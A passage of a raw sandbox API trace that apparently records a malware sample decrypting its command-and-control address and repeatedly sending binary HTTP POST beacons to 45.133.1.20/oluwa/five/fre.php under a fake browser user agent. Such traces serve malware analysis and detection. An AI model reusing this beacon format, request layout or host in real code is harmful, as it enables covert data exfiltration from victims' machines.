hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e0f50 | out: hHeap=0x6a0000) returned 1 [0300.527] GetProcessHeap () returned 0x6a0000 [0300.527] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0300.527] GetProcessHeap () returned 0x6a0000 [0300.527] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6e0f50 [0300.528] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0300.529] wvsprintfA (in: param_1=0x6e0f50, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0300.529] GetProcessHeap () returned 0x6a0000 [0300.529] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0300.529] GetProcessHeap () returned 0x6a0000 [0300.530] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e0f50 | out: hHeap=0x6a0000) returned 1 [0300.530] send (s=0xb58, buf=0x6bd460*, len=242, flags=0) returned 242 [0300.532] send (s=0xb58, buf=0x6bb998*, len=159, flags=0) returned 159 [0300.532] GetProcessHeap () returned 0x6a0000 [0300.532] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0300.532] recv (in: s=0xb58, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0300.605] GetProcessHeap () returned 0x6a0000 [0300.606] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0300.606] GetProcessHeap () returned 0x6a0000 [0300.606] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0300.607] GetProcessHeap () returned 0x6a0000 [0300.607] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da648 | out: hHeap=0x6a0000) returned 1 [0300.607] GetProcessHeap () returned 0x6a0000 [0300.607] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6befd0 | out: hHeap=0x6a0000) returned 1 [0300.608] closesocket (s=0xb58) returned 0 [0300.609] GetProcessHeap () returned 0x6a0000 [0300.609] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9e0 | out: hHeap=0x6a0000) returned 1 [0300.609] GetProcessHeap () returned 0x6a0000 [0300.609] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0300.609] GetProcessHeap () returned 0x6a0000 [0300.610] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0300.610] GetProcessHeap () returned 0x6a0000 [0300.610] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3490 | out: hHeap=0x6a0000) returned 1 [0300.611] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1890) returned 0xb58 [0300.613] Sleep (dwMilliseconds=0xea60) [0300.625] GetProcessHeap () returned 0x6a0000 [0300.625] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0300.625] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0300.626] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0300.637] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0300.637] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bed28) returned 1 [0300.646] GetProcessHeap () returned 0x6a0000 [0300.646] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0300.647] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0300.648] CryptImportKey (in: hProv=0x6bed28, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0300.648] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0300.649] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0300.650] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0300.650] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0300.650] GetProcessHeap () returned 0x6a0000 [0300.651] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0300.651] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0300.652] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0300.653] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0300.653] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0300.654] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0300.654] CryptReleaseContext (hProv=0x6bed28, dwFlags=0x0) returned 1 [0300.654] GetProcessHeap () returned 0x6a0000 [0300.654] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0300.655] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0300.656] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0300.660] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0300.660] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0300.661] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0300.661] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0300.662] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0300.663] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0300.663] GetProcessHeap () returned 0x6a0000 [0300.663] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0300.663] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0300.663] GetProcessHeap () returned 0x6a0000 [0300.664] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0300.664] GetProcessHeap () returned 0x6a0000 [0300.664] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0300.664] GetProcessHeap () returned 0x6a0000 [0300.665] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0300.665] GetProcessHeap () returned 0x6a0000 [0300.665] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0300.666] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0300.666] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0300.682] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0300.683] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0300.692] GetProcessHeap () returned 0x6a0000 [0300.692] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0300.693] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0300.704] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0300.705] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0300.705] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0300.706] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0300.706] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0300.706] GetProcessHeap () returned 0x6a0000 [0300.707] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0300.708] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0300.708] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0300.709] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0300.709] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0300.710] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0300.711] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0300.711] GetProcessHeap () returned 0x6a0000 [0300.711] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0300.714] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0300.715] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0300.715] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0300.716] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0300.717] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0300.717] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0300.718] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0300.719] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0300.719] GetProcessHeap () returned 0x6a0000 [0300.719] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0300.719] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0300.719] GetProcessHeap () returned 0x6a0000 [0300.719] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baaf0 [0300.719] socket (af=2, type=1, protocol=6) returned 0xb5c [0300.720] connect (s=0xb5c, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0300.747] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0300.747] GetProcessHeap () returned 0x6a0000 [0300.747] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0300.747] GetProcessHeap () returned 0x6a0000 [0300.747] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6e0f50 [0300.748] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0300.751] wvsprintfA (in: param_1=0x6e0f50, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0300.751] GetProcessHeap () returned 0x6a0000 [0300.751] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6db188 [0300.751] GetProcessHeap () returned 0x6a0000 [0300.752] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e0f50 | out: hHeap=0x6a0000) returned 1 [0300.752] GetProcessHeap () returned 0x6a0000 [0300.752] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4be0 [0300.752] GetProcessHeap () returned 0x6a0000 [0300.752] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6e0f50 [0300.753] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0300.754] wvsprintfA (in: param_1=0x6e0f50, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0300.754] GetProcessHeap () returned 0x6a0000 [0300.754] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0300.754] GetProcessHeap () returned 0x6a0000 [0300.754] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e0f50 | out: hHeap=0x6a0000) returned 1 [0300.754] send (s=0xb5c, buf=0x6bd460*, len=242, flags=0) returned 242 [0300.756] send (s=0xb5c, buf=0x6bb998*, len=159, flags=0) returned 159 [0300.756] GetProcessHeap () returned 0x6a0000 [0300.756] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0300.756] recv (in: s=0xb5c, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0300.836] GetProcessHeap () returned 0x6a0000 [0300.836] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0300.837] GetProcessHeap () returned 0x6a0000 [0300.838] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0300.838] GetProcessHeap () returned 0x6a0000 [0300.838] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6db188 | out: hHeap=0x6a0000) returned 1 [0300.838] GetProcessHeap () returned 0x6a0000 [0300.839] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0300.839] closesocket (s=0xb5c) returned 0 [0300.840] GetProcessHeap () returned 0x6a0000 [0300.840] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baaf0 | out: hHeap=0x6a0000) returned 1 [0300.840] GetProcessHeap () returned 0x6a0000 [0300.841] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0300.841] GetProcessHeap () returned 0x6a0000 [0300.842] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0300.842] GetProcessHeap () returned 0x6a0000 [0300.842] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0300.843] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1894) returned 0xb5c [0300.846] Sleep (dwMilliseconds=0xea60) [0300.848] GetProcessHeap () returned 0x6a0000 [0300.848] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0300.849] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0300.849] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0300.860] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0300.860] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf168) returned 1 [0300.873] GetProcessHeap () returned 0x6a0000 [0300.873] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0300.873] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0300.874] CryptImportKey (in: hProv=0x6bf168, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0300.875] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0300.875] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0300.876] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0300.877] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0300.877] GetProcessHeap () returned 0x6a0000 [0300.881] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0300.882] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0300.882] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0300.883] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0300.884] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0300.885] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0300.886] CryptReleaseContext (hProv=0x6bf168, dwFlags=0x0) returned 1 [0300.886] GetProcessHeap () returned 0x6a0000 [0300.886] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0300.887] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0300.887] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0300.888] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0300.893] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0300.894] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0300.894] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0300.895] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0300.895] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0300.895] GetProcessHeap () returned 0x6a0000 [0300.895] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0300.895] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0300.896] GetProcessHeap () returned 0x6a0000 [0300.897] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0300.897] GetProcessHeap () returned 0x6a0000 [0300.897] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0300.900] GetProcessHeap () returned 0x6a0000 [0300.900] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0300.900] GetProcessHeap () returned 0x6a0000 [0300.900] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0300.901] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0300.901] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0300.906] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0300.907] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bec18) returned 1 [0300.916] GetProcessHeap () returned 0x6a0000 [0300.916] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0300.916] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0300.917] CryptImportKey (in: hProv=0x6bec18, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0300.918] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0300.918] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0300.919] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0300.920] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0300.920] GetProcessHeap () returned 0x6a0000 [0300.920] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0300.921] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0300.921] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0300.922] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0300.922] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0300.923] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0300.923] CryptReleaseContext (hProv=0x6bec18, dwFlags=0x0) returned 1 [0300.923] GetProcessHeap () returned 0x6a0000 [0300.923] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0300.924] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0300.924] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0300.925] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0300.925] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0300.927] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0300.929] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0300.930] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0300.930] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0300.931] GetProcessHeap () returned 0x6a0000 [0300.931] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0300.931] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0300.931] GetProcessHeap () returned 0x6a0000 [0300.931] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa90 [0300.931] socket (af=2, type=1, protocol=6) returned 0xb60 [0300.931] connect (s=0xb60, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0300.959] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0300.959] GetProcessHeap () returned 0x6a0000 [0300.959] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bec18 [0300.959] GetProcessHeap () returned 0x6a0000 [0300.959] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6e0f50 [0300.962] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0300.963] wvsprintfA (in: param_1=0x6e0f50, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0300.963] GetProcessHeap () returned 0x6a0000 [0300.963] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6dab88 [0300.963] GetProcessHeap () returned 0x6a0000 [0300.964] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e0f50 | out: hHeap=0x6a0000) returned 1 [0300.964] GetProcessHeap () returned 0x6a0000 [0300.964] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0300.964] GetProcessHeap () returned 0x6a0000 [0300.964] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6e0f50 [0300.964] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0300.965] wvsprintfA (in: param_1=0x6e0f50, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: 